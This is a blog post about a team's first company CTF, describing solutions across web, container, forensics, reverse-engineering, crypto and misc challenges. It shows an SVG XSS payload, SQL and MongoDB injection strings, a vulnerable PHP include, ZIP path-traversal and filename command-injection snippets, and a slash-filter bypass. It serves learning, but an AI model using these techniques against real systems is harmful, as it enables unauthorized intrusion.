Our first ever CTF was challenging fun

by & about Security in Technology

During the last two days we participated in our first ever security CTF, and it was awesome.

This week at Red Hat we had something quite unique: a company-wide security capture the flag game, and we thoroughly enjoyed it. Two days of puzzle solving, hacking into systems, and all kinds of shenanigans around that topic. The end goal in each challenge was to find a string, a “flag”, which had to be submitted in the CTF system for points.

As we went into it, we didn’t know what to expect. Neither of us had ever done anything like it. Our only experience in security was on the defensive side as software developers. Sure, we knew the common things like SQL injection, XSS, etc. but beyond that? Would it be buffer overflows? Reverse engineering a binary? We had no clue.

Spoiler alert!
This post contains spoilers for the Red Hat PS 20th Anniversary CTF. If you are still solving the challenges after the deadline, please stop reading.

Web application security

The minute the start was announced, we headed to the CTF system. As expected, it presented us with a list of challenges. With both of us having a web background, we threw ourselves at the web application security section first, with very few ideas of how the rest (cryptography, reverse engineering, digital forensics, etc.) would work.

In the web application security section, we were presented with a 1998-style website where we had to uncover three vulnerabilities. The website had several features:

  • Change the SVG background of a DIV on the website
  • A chat interface, which was read-only because we were not logged in
  • A music player

XSS

The first thing we looked at was the SVG upload. An uploaded SVG was embedded directly into the HTML source code of the website:

<div>
    <svg>
        <!-- Here comes more uploaded content -->
    </svg>
</div>

To anyone who has done web application development this screams cross-site scripting. XSS is an injection-type vulnerability, where you can inject JavaScript into a website. So we constructed an SVG file with the following content:

<svg>
    <script>alert("Hello world!")</script>
</svg>

Sure enough, it worked. The challenge was actually written in such a way that it detected the XSS attempt and presented the flag as a result. (There were a few more steps involved, which we won’t spoil here, in case you are still solving the challenges.)

NoSQL injection

Next up was the chat interface. It sent an API call to a PHP file with the following parameters:

{
  "username": null,
  "channel": "public"
}

It also contained a hint that the public channel was only selected because there is no username set. This told us that there are more channels, and that the security for accessing these channels was most likely done on the client side. We tried a few channel names, and usernames, to no avail.

Then we started looking into SQL injection. The typical:

{
  "username": null,
  "channel": "\" OR 1=1 --"
}

No dice, it didn’t work. We kept poking for quite a while, until we then ran an API query against the chat API which was supposed to send a message into the chat. We got a MongoDB error. So the database wasn’t a SQL database at all, it was MongoDB!

A quick google for “MongoDB injection” turned up the answer in the very first result.

Since the website was PHP (you could tell from the URL), we were able to exploit the weird nature of parameter handling in PHP. If you write something.php?username[foo]=bar the username field will not be a string in PHP, it will be an array.

Since MongoDB accepts arrays for queries, we were then able to inject a query that said select all messages where the channel is not public. Tada, there’s our second flag.
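To make the trick a bit more concrete, here is a minimal Go sketch that builds such a query string. It is an illustration, not the exact request we sent: the endpoint name chat.php is made up, and we assume the "not equal" condition is expressed with MongoDB's $ne operator.

```go
package main

import (
	"fmt"
	"net/url"
)

// buildInjection returns a query string in which PHP would parse "channel"
// as an array {"$ne": excluded} instead of a plain string.
func buildInjection(excluded string) string {
	q := url.Values{}
	q.Set("channel[$ne]", excluded)
	return q.Encode()
}

func main() {
	// chat.php is a hypothetical endpoint name used for illustration only.
	fmt.Println("/chat.php?" + buildInjection("public"))
}
```

The brackets and the dollar sign are percent-encoded on the wire, and PHP decodes them again before building the array.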

URL manipulation / unsafe inclusion

The next challenge we understood in theory, but weren’t able to actually solve.

When clicking on the song selector on the website, the URL changed to /?tune=tune1.php. This told us the authors had, of course intentionally, committed what many in the PHP space do in their first days of programming: unsafe inclusion of files. The source code would look roughly like this:

<audio src="<?php
include $_GET["tune"];
echo($tune);
?>">

If you manipulate the tune parameter to point to a different file, the page loads that file instead of the intended tune*.php. This can be used to run unintended code. In the ancient PHP days you were even able to pass a URL in the parameter to load the code from a remote server. (This has been disabled by default and is now being removed entirely.)

Unfortunately, despite finding the correct MP3 file on the server, we were not able to find the correct PHP file to execute for the challenge. The authors of the challenge had also put in some safeguards to make sure only the intended files could be executed.

Cloud security

The cloud security section revolved around containers and registries. As we have both worked with containers extensively and Janos wrote a guide on the topic, this was fairly simple.

The first challenge involved downloading a container image, then extracting a file from the image.

The second challenge was a bit trickier: we had to find the flag in a container registry. This involved finding a container image with the flag embedded in the name. Thankfully, the registry API has a way to list container images by accessing /v2/_catalog. We initially thought we had to pull the image, but no, the flag was actually the container name itself.
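For reference, the catalog endpoint returns a small JSON document with a "repositories" array. The Go sketch below shows one way to read it. The repository names in the sample are made up, and fetchCatalog assumes a registry that answers without authentication, which may not hold for the one you are looking at.

```go
package main

import (
	"encoding/json"
	"fmt"
	"io"
	"net/http"
)

// catalog mirrors the JSON body returned by GET /v2/_catalog.
type catalog struct {
	Repositories []string `json:"repositories"`
}

// parseCatalog extracts the repository names from a catalog response body.
func parseCatalog(body []byte) ([]string, error) {
	var c catalog
	if err := json.Unmarshal(body, &c); err != nil {
		return nil, err
	}
	return c.Repositories, nil
}

// fetchCatalog queries a registry at baseURL (assumed to need no authentication).
func fetchCatalog(baseURL string) ([]string, error) {
	resp, err := http.Get(baseURL + "/v2/_catalog")
	if err != nil {
		return nil, err
	}
	defer resp.Body.Close()
	body, err := io.ReadAll(resp.Body)
	if err != nil {
		return nil, err
	}
	return parseCatalog(body)
}

func main() {
	// Sample response with made-up repository names, so the sketch runs offline.
	sample := []byte(`{"repositories":["app/web","ctf/example-name"]}`)
	names, err := parseCatalog(sample)
	if err != nil {
		panic(err)
	}
	for _, n := range names {
		fmt.Println(n)
	}
}
```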

The third challenge was again the same as the first, but we had to extract the secret from a file that had been deleted from the container image. Do a docker image save, inspect the layers, and there was the flag.
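Why this works: each layer of a saved image is itself a tarball, and deleting a file in a later layer only adds a whiteout marker (a .wh. entry) while the earlier layer keeps the original bytes. The Go sketch below illustrates that with two tiny in-memory layers. The file name and contents are made up, and we did this by hand rather than with code.

```go
package main

import (
	"archive/tar"
	"bytes"
	"fmt"
	"io"
)

// findInLayer scans one layer tarball for name and returns its contents.
func findInLayer(layer []byte, name string) ([]byte, bool) {
	tr := tar.NewReader(bytes.NewReader(layer))
	for {
		hdr, err := tr.Next()
		if err != nil { // io.EOF or a damaged archive: nothing more to scan
			return nil, false
		}
		if hdr.Name == name {
			data, err := io.ReadAll(tr)
			return data, err == nil
		}
	}
}

// makeLayer builds a one-file layer in memory so the sketch runs without Docker.
func makeLayer(name, content string) []byte {
	var buf bytes.Buffer
	tw := tar.NewWriter(&buf)
	hdr := &tar.Header{Name: name, Typeflag: tar.TypeReg, Mode: 0600, Size: int64(len(content))}
	if err := tw.WriteHeader(hdr); err != nil {
		panic(err)
	}
	if _, err := tw.Write([]byte(content)); err != nil {
		panic(err)
	}
	if err := tw.Close(); err != nil {
		panic(err)
	}
	return buf.Bytes()
}

func main() {
	// Layer 1 adds the file; layer 2 "deletes" it with a whiteout marker.
	layers := [][]byte{
		makeLayer("secret.txt", "example-secret"),
		makeLayer(".wh.secret.txt", ""),
	}
	for i, l := range layers {
		if data, ok := findInLayer(l, "secret.txt"); ok {
			fmt.Printf("layer %d still contains secret.txt: %s\n", i+1, data)
		}
	}
}
```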

Digital forensics

Having sorted out the easier challenges, we started digging into the parts that were a bit more foreign to us. The first of many: digital forensics.

This section had two challenges. The first involved a memory dump from a Linux system, which had the flag buried in the memory of a process. The second involved finding GPS coordinates in an image file.

Let’s address the second one first. One would think that this is trivial: read the EXIF metadata and there are the coordinates. Right? Yes, except there was no EXIF metadata. As it turned out, the RDF metadata was hidden in the picture itself. We found a tool that can extract hidden data, which managed to do the task. Prior to that, we had tried the usual strings, identify, and various other command line approaches, as well as changing colors and thresholds and looking at the metadata presented in GIMP.

The other challenge was about analyzing a Linux memory dump. After doing a bit of googling, we found that this is accomplished with a tool called Volatility. Setting it up was a bit of a hassle, but it proved worthwhile. This tool brought a wealth of things we could look at in the memory dump: process list, open files, extracting memory-mapped files, and even extracting Firefox history thanks to a community plugin.

There, the process list showed us that the system was a desktop Linux and had Firefox, kate, and emacs running. We suspected that the flag was hidden in the memory space of one of these processes. Unfortunately, we had to install an extra tool called Yara and the python-yara library in order to dump memory. This took some fiddling around, and we had to patch the Volatility source code slightly as described in this comment. Once we did, we made short work of the memory dump. Search for CTF and sure enough, we got the memory region with the flag.
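The final search step is simple enough to sketch in Go. This is only an illustration of scanning a dumped memory region for a marker: the bytes below are made up, and in practice we searched the files Volatility had written out.

```go
package main

import (
	"bytes"
	"fmt"
)

// findMarker returns every offset at which marker occurs in dump.
func findMarker(dump, marker []byte) []int {
	var offsets []int
	for start := 0; ; {
		i := bytes.Index(dump[start:], marker)
		if i < 0 {
			return offsets
		}
		offsets = append(offsets, start+i)
		start += i + 1
	}
}

func main() {
	// Made-up bytes standing in for a dumped memory region.
	dump := []byte("\x00\x13junk\x00CTF{not-a-real-flag}\x00more\x7f")
	for _, off := range findMarker(dump, []byte("CTF")) {
		// Print a short window after each hit to see what follows the marker.
		end := off + 24
		if end > len(dump) {
			end = len(dump)
		}
		fmt.Printf("offset %d: %q\n", off, dump[off:end])
	}
}
```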

Reverse engineering

Next up on our list was reverse engineering: we were given binaries and needed to provide the application with the correct input to get to the flag.

In retrospect, the first challenge was quite easy as the flag was stored in the data segment of the application, so it could have been extracted with the strings utility. However, we didn’t realize this and went straight at it with gdb. This took some getting used to. Several hours, in fact, as we had never used gdb before. Since the binaries didn’t have debug symbols compiled in, we couldn’t map the machine code back to the original source and had to resort to reading the ASM code. The experience gathered while writing the 512-byte VM definitely came in handy.
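For the curious, what the strings utility does is roughly the following: it prints every run of printable characters that is at least four bytes long. Here is a rough Go approximation, restricted to ASCII and run on made-up sample bytes rather than on the challenge binary.

```go
package main

import "fmt"

// printableRuns returns runs of printable ASCII at least minLen bytes long,
// roughly what the strings utility reports.
func printableRuns(data []byte, minLen int) []string {
	var runs []string
	start := -1 // index where the current run began, or -1 if not in a run
	for i := 0; i <= len(data); i++ {
		printable := i < len(data) && data[i] >= 0x20 && data[i] <= 0x7e
		if printable {
			if start < 0 {
				start = i
			}
			continue
		}
		// The run (if any) ended just before i; keep it if it is long enough.
		if start >= 0 && i-start >= minLen {
			runs = append(runs, string(data[start:i]))
		}
		start = -1
	}
	return runs
}

func main() {
	// Made-up bytes standing in for a binary's data segment.
	data := []byte("\x7fELF\x01\x02ab\x00CTF{example}\x00\x03")
	for _, s := range printableRuns(data, 4) {
		fmt.Println(s)
	}
}
```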

Having to look at ASM code, we realized the following two GDB commands would be most helpful:

tui enable
layout asm

This made GDB much friendlier:

[Screenshot: GDB with the text UI enabled, showing several lines of assembly code]

Next up, set a break point on the main function:

b *main

Then run the program:

run

It stopped immediately at our first break point. We could advance step by step with the si command.

We went through the program until we reached one of the je or jne instructions. These instructions jump (or don’t jump) based on a check before. If the check fails, the program continues. If it succeeds, the program jumps to a new memory address. For each jump we made notes of the next instruction address, as well as the jump target address. Since we had the wrong input, the program would obviously go the “wrong way”, so whenever a jump happened / didn’t happen, we overrode it by using the j command in gdb to go to the right place and keep running down that path. That way we were able to get to the point in the application where it printed the correct flag for the first two challenges.

The third, however, eluded us as the algorithm was just too complex for us to debug through. Instead, we resorted to installing IDA Free from Hex-Rays. We knew from several YouTube videos that this tool is widely used for reverse engineering.

Loading up the program, we were presented with this screen:

[Screenshot: the IDA interface showing several execution paths in the code, as well as the assembly code]

This interface already chunks up the code into easily readable execution paths. We could also add notes, rename variables, and so on. However, the really big deal was hitting F5, which presented us with extracted C-like pseudocode for the application.

Here we had to make a few educated guesses about the data type of each variable. IDA would present us with the contents of the working memory as the program ran. We were then able to look at the algorithm that verified our input.

We were able to extract the data baked into the binary, and translate the C-like pseudocode into Go to execute it on the data. Here is the example, with the variables already named in IDA:

__int64 __fastcall is_boss_here2(
  char *input,
  char (*flagData1)[32],
  char (*flagData2)[32])
{
  char tmp[24]; // [rsp+18h] [rbp-30h] BYREF
  int useless1; // [rsp+30h] [rbp-18h]
  char useless2; // [rsp+34h] [rbp-14h]
  char v7; // [rsp+3Fh] [rbp-9h]
  int cnt; // [rsp+40h] [rbp-8h]
  int i; // [rsp+44h] [rbp-4h]

  v7 = 1;
  cnt = 1;
  memset(tmp, 0, sizeof(tmp));
  useless1 = 0;
  useless2 = 0;
  for ( i = 0; i <= 28; ++i )
    tmp[i] ^= (*flagData2)[i];
  for ( i = 0; i <= 27; ++i )
  {
    if ( cnt == 8 )
      cnt = 1;
    if (
      (*flagData1)[i + 1] + cnt !=
      (char)(input[i] ^ tmp[i]) )
    {
      v7 = 0;
      return 0LL;
    }
    ++cnt;
  }
  return (unsigned int)v7;
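}

Our Go translation, with the extracted data elided:

package main

import "fmt"

func main() {
  // tmp corresponds to the buffer the C code fills from flagData2.
  tmp := []byte{
    0x00, 0x00, //...
  }
  // flagData corresponds to flagData1 in the C code.
  flagData := []byte{
    0x2E, 0x4F, //...
  }

  // cnt cycles through 1..7, exactly as in the decompiled loop.
  var cnt byte = 1
  for i := 0; i < 28; i++ {
    if cnt == 8 {
      cnt = 1
    }
    // Invert the check: input[i] = (flagData1[i+1] + cnt) ^ tmp[i].
    char := (flagData[i+1] + cnt) ^ tmp[i]
    fmt.Printf("%s", []byte{char})
    cnt++
  }
}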

And that was our third reverse engineering flag done!

Cryptography

The cryptography section definitely presented us with a few challenges. The first two required applying a sequence of hex, base64 and base32 decoding to a string to reach the flag. This was fiddly, but ultimately didn’t take us too much time.
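Peeling off such layers looks roughly like the Go sketch below. The order of the layers (hex on the outside, then base64, then base32) is an assumption made for illustration, as is the sample string; the actual challenges used their own sequences.

```go
package main

import (
	"encoding/base32"
	"encoding/base64"
	"encoding/hex"
	"fmt"
)

// decodeChain undoes hex, then base64, then base32 (an assumed order).
func decodeChain(s string) (string, error) {
	b, err := hex.DecodeString(s)
	if err != nil {
		return "", err
	}
	b, err = base64.StdEncoding.DecodeString(string(b))
	if err != nil {
		return "", err
	}
	b, err = base32.StdEncoding.DecodeString(string(b))
	if err != nil {
		return "", err
	}
	return string(b), nil
}

// encodeChain applies the layers in reverse, only to produce sample input.
func encodeChain(s string) string {
	b32 := base32.StdEncoding.EncodeToString([]byte(s))
	b64 := base64.StdEncoding.EncodeToString([]byte(b32))
	return hex.EncodeToString([]byte(b64))
}

func main() {
	wrapped := encodeChain("CTF{example}")
	plain, err := decodeChain(wrapped)
	if err != nil {
		panic(err)
	}
	fmt.Println(plain)
}
```

When the order is not known up front, the alphabet of each intermediate result (only hex digits, trailing = padding, only uppercase letters and digits 2-7) is usually a good hint for the next layer.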

The third one, however, required us to open up IDA once more. Again, running the decompiler, we ended up with the pseudocode. However, this time around it wasn’t as straightforward as previously. The program constructed the flag from the input. This meant that we had to supply the correct input to receive the correct output. There was no way to simply print the correct flag from memory contents.

The application was built in two parts: the first part did a set of bit manipulations on the input. The second part created an SHA1 hash from the bit-manipulated input and verified it against the hash stored in the binary.

This was good: we didn’t actually have to crack the SHA1, but we could use it to verify if our input was correct.
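The verification idea can be sketched in Go as follows. The transform function here is a hypothetical stand-in (it just XORs every byte with the input length) and not the challenge's real bit manipulations; the inputs and the expected hash are made up as well.

```go
package main

import (
	"crypto/sha1"
	"encoding/hex"
	"fmt"
)

// transform is a hypothetical stand-in for the binary's bit manipulations;
// like the real ones, its output depends on the input length.
func transform(input []byte) []byte {
	out := make([]byte, len(input))
	for i, b := range input {
		out[i] = b ^ byte(len(input))
	}
	return out
}

// matches reports whether the transformed candidate hashes to wantHex.
func matches(candidate, wantHex string) bool {
	sum := sha1.Sum(transform([]byte(candidate)))
	return hex.EncodeToString(sum[:]) == wantHex
}

func main() {
	// In the challenge the hash was stored in the binary; here we derive one
	// from a made-up input so the sketch checks itself.
	sum := sha1.Sum(transform([]byte("example-input")))
	want := hex.EncodeToString(sum[:])
	for _, c := range []string{"wrong-input", "example-input"} {
		fmt.Printf("%s: %v\n", c, matches(c, want))
	}
}
```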

As mentioned, the first part of the application applied a series of bit manipulations to the input. Critically though, these involved the length of the input as a parameter. As the length changed, the output would change. However, this only affected bytes 3, 4, 5, and so on.

We had one more advantage: we knew that the flags each started with a fixed set of characters. This allowed us to construct a reverse algorithm in Go and then run it for the first few bytes. This was enough to extract the correct input, which then gave us the flag.

The hardest of all: misc

Last but not least, there was the misc category. One challenge involved a web interface which verified the password using JavaScript. This one was tricky, because it used the weird type coercion in JavaScript. We used the browser console to reverse the algorithm and construct the flag. (We actually found a bug in this challenge and reported it.)

The next one was quite tricky: it contained an audio file with clicks in it. The text gave us a hint which open source tool to use, and we managed to extract the data.

The third, however, was definitely the hardest of all the challenges we managed to solve. Here we had a web interface, where we could upload a firmware to a supposed system. We then had to SSH into the system and run the update command. The web interface offered the current firmware for download.

We fairly quickly figured out that the firmware was a ZIP file, and it needed to contain two files: firmware.bin.enc and firmware.secret.enc. These were GPG encrypted, and we had neither the private nor the public key, so we could neither decrypt nor encrypt any data.

We soon figured out that we could use gpg --store to create a GPG-compatible file that would not be encrypted, but correctly decrypted when run through gpg --decrypt. However, that got us nowhere.

We thought for quite a while that we needed to put extra files in the ZIP that would then overwrite system files, but that was not the case. Using Golang again, we created a ZIP archiver which would create specially crafted paths like ../../../app/config.cfg, but that didn’t work either.
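A minimal sketch of such an archiver is below. It is not our original program: the entry contents are placeholders, and it only shows that Go's archive/zip stores an entry name as given, including any ../ segments.

```go
package main

import (
	"archive/zip"
	"bytes"
	"fmt"
)

// buildZip stores each content under its entry name exactly as given.
func buildZip(entries map[string]string) ([]byte, error) {
	var buf bytes.Buffer
	zw := zip.NewWriter(&buf)
	for name, content := range entries {
		w, err := zw.Create(name)
		if err != nil {
			return nil, err
		}
		if _, err := w.Write([]byte(content)); err != nil {
			return nil, err
		}
	}
	if err := zw.Close(); err != nil {
		return nil, err
	}
	return buf.Bytes(), nil
}

// hasRawName reports whether name appears verbatim in the archive bytes
// (ZIP headers store entry names uncompressed).
func hasRawName(archive []byte, name string) bool {
	return bytes.Contains(archive, []byte(name))
}

func main() {
	archive, err := buildZip(map[string]string{
		"firmware.bin.enc":        "placeholder",
		"../../../app/config.cfg": "placeholder",
	})
	if err != nil {
		panic(err)
	}
	fmt.Println(hasRawName(archive, "../../../app/config.cfg"))
}
```

Whether such a path actually escapes the target directory depends entirely on how the receiving side extracts the archive. In this challenge it didn't.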

Finally, we realized that this was all about command injection when we took a deep look at whatever the console gave us. In this case, the image name they used started with cmd-inj- which we simply took as a hint, even though it possibly wasn’t meant to be one. The interface would GPG decrypt the files, so if the filenames contained shell commands those might be executed. Using our Go program from before, we added a few lines:

if strings.HasSuffix(relPath, "payload.enc") {
    relPath = fmt.Sprintf("; add-injected-command-here ; %s", relPath)
}

There we go, we were able to run commands. We listed the processes, dumped directory contents, but we were not able to get out of the current directory. Turns out, the CLI we were in blacklisted the / character. No problem, just use cd .. a few times, and we were in the root directory, dumping the config of the application itself. We were even able to write to some directories we shouldn’t have been able to, which we reported. (This is a fabulous use case for ContainerSSH, cough hint cough.) We were also able to extract the GPG key, which let us decode the original firmware.

The decrypted firmware contained a hint to the location of the flag. Normally we’d have to use ./programname to execute it, which wouldn’t work due to the filtering, but that was no problem either. We set the PATH from a base64-encoded payload to the correct directory and that was our flag extracted.
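The base64 trick deserves a short illustration. The Go sketch below encodes a directory so that the typed command no longer contains a / character. The directory name and the shell syntax are assumptions, not what we actually typed. Note that / is itself part of the standard base64 alphabet, so the encoded value has to be checked as well.

```go
package main

import (
	"encoding/base64"
	"fmt"
	"strings"
)

// encodeSlashFree base64-encodes value and reports whether the result avoids
// the '/' character, which is part of the standard base64 alphabet.
func encodeSlashFree(value string) (string, bool) {
	enc := base64.StdEncoding.EncodeToString([]byte(value))
	return enc, !strings.Contains(enc, "/")
}

func main() {
	// Hypothetical directory; the real one came from the decrypted firmware.
	enc, ok := encodeSlashFree("/opt/example/bin")
	if !ok {
		fmt.Println("encoding contains '/', try a slightly different value")
		return
	}
	// Assumed shell syntax for the restricted CLI; it may differ in practice.
	fmt.Printf("PATH=$(echo %s | base64 -d)\n", enc)
}
```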

The ones we didn’t solve

There were several challenges that we didn’t have time for. There was a fairly interesting middleware system with web services (WSDL), a shopping cart system that had a crypto algorithm that would have needed to be reverse engineered, a cryptocurrency challenge, and an access control challenge. Too bad we didn’t get to solve these as the previous challenges already ate away all our time.

Conclusion

This CTF was an extreme amount of fun, and we learned more in two days than in months previously. The challenges were really well made, even if some of them seemed a bit artificial. Out of almost 200 teams, we took second place. We are very thankful we had the opportunity to participate. 1010/1010 - would do it again.